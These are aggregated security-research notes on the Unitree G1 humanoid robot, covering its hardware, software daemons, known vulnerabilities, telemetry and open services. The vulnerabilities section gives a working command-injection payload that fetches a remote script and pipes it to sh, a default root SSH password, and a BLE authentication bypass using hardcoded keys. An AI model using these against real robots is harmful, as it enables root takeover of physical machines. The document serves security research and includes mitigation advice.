# Cybersecurity of the Unitree G1 — Detailed Findings
**Sources:** arXiv:2509.14096, arXiv:2509.14139, UniPwn (GitHub: Bin4ry/UniPwn), FreeBOT (theroboverse.com)
**Fetched:** 2026-02-13
**Type:** Security Research — Aggregated Findings

---

## Locomotion Computer Hardware

- **Processor:** Rockchip RK3588 (8-core ARM Cortex-A76/A55)
- **RAM:** 8GB LPDDR4X
- **Storage:** 32GB eMMC
- **Kernel:** Linux 5.10.176-rt86+ (real-time patched)
- **Network:** eth0 at 192.168.123.161/24, wlan0 at 192.168.8.193/24

## Software Architecture

- `master_service` orchestrator (9.2 MB binary) supervises 26 daemons
- `ai_sport` — primary locomotion/balance policy (145% CPU, 135 MB RAM)
- `state_estimator` — sensor fusion (~30% CPU)
- `motion_switcher` — gait mode management
- `robot_state_service`, `dex3_service_l/r`, `webrtc_bridge`, `ros_bridge`
- Configuration files encrypted with **FMX format**: Blowfish-ECB + LCG stream cipher with static keys (partially reverse-engineered)
- Unix socket: `/unitree/var/run/master_service.sock`

## Known Vulnerabilities

### UniPwn BLE Exploit (Bin4ry, Sep 2025)
- Affects: G1, H1, R1, Go2, B2
- Hardcoded AES encryption keys identical across ALL Unitree robots
- Authentication: encrypt string "unitree" with known key → passes
- SSID/password fields passed to `system()` with root privileges
- **Wormable:** infected robot can scan BLE and compromise other Unitree robots
- GitHub: Bin4ry/UniPwn

### FreeBOT Jailbreak (TheRoboVerse)
- Command injection via WiFi password field in mobile app
- Payload: `;curl -L 4jb.me|sh;#`
- Works on firmware 1.3.0-1.6.0
- SSH after jailbreak: root:theroboverse
- Patched in firmware 1.1.8+ (October 2025)

### Known CVEs on RK3588
- CVE-2023-52660, CVE-2025-38081, CVE-2024-57256

## Telemetry (Data Exfiltration)
- Robot phones home every ~5 minutes via MQTT (port 17883)
- Data sent: audio, video, LiDAR, GPS, robot state
- Destination IPs: 43.175.228.18, 43.175.229.18, 8.222.78.102
- Mitigation: block outbound at network firewall, or isolate robot network from internet

## Open Services on 192.168.123.161
- DDS/Iceoryx: UDP 7400
- WebRTC signal server: port 8081
- MQTT: port 17883 (outbound to telemetry servers)

## Key Conclusion
Root access to the RK3588 is achievable via BLE exploits. However, nobody has publicly documented replacing `ai_sport` (the stock locomotion policy) with a custom binary, or extracting the RL policy weights from it. The FMX-encrypted configuration files and the `master_service` orchestrator remain barriers. All research groups deploy custom policies from external computers via DDS.